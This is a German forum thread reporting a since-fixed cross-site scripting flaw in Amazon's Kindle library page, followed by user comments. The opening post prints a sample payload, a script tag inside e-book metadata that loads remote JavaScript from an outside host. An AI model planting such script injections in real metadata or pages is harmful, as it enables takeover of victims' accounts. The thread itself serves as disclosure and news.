Sicherheitslücke beim E-Book-Reader Kindle

milbo · 17. September 2014, 13:08

Schwere Sicherheitslücke im E-Book-Reader Kindle: Angreifer können über die Kindle-Bibliothek auf der Amazon-Website vollen Zugriff auf das Kundenkonto des Opfers erlangen.

Amazons E-Book-Reader Kindle hat ein Sicherheitsleck. Angreifer erhalten über manipulierte E-Books vollen Zugriff auf das Amazon-Konto der Kindle-Leser. Der Trick: Die Hacker platzieren in den Metadaten des E-Books, also beispielsweise im Buchtitel, einen Skriptaufruf folgenden Formats:

Quellcode

<script src="https://www.example.org/script.js"></script>

Ruft der Kindle-Besitzer nun die Kindle-Bibliothek auf der Amazon-Website auf, dann wird das Skript ausgeführt und der Angreifer erhält Zugriff auf das Benutzerkonto des Kunden.

Sicherheitslücke beim E-Book-Reader Kindle

SonyFan · 17. September 2014, 15:08

Danke für die Info.
Aber nur am Rande:D
Ich wusste nichtmal das es sowas gibt (Amazon Kindle Bibliothek) trotz einiger Kindle im Hause.
Es lebe das FSB

kumpel anton · 17. September 2014, 15:37

Hilfreiche Info,

ich benutze meinen Kindle auch sehr viel aber die Bücher hole ich mir ausschließlich hier bei FSB :cool:

Fockbloete · 18. September 2014, 11:50

Also noch ein Grund die Bücherbefüllung des Kindle unabhängig von Amazon vorzunehmen.

Lythande · 19. September 2014, 15:27

Irgendeine Idee wie man sich schützen kann? Ich habe an die 200 Bücher in der Wolke bei Amazon.

milbo · 19. September 2014, 19:30

Laut neuesten Aussagen hat Amazon dieses Problem jedoch inzwischen behoben.

Cross-Site-Scripting Lücke bei Kindle E-Books

Quellcode

Teilen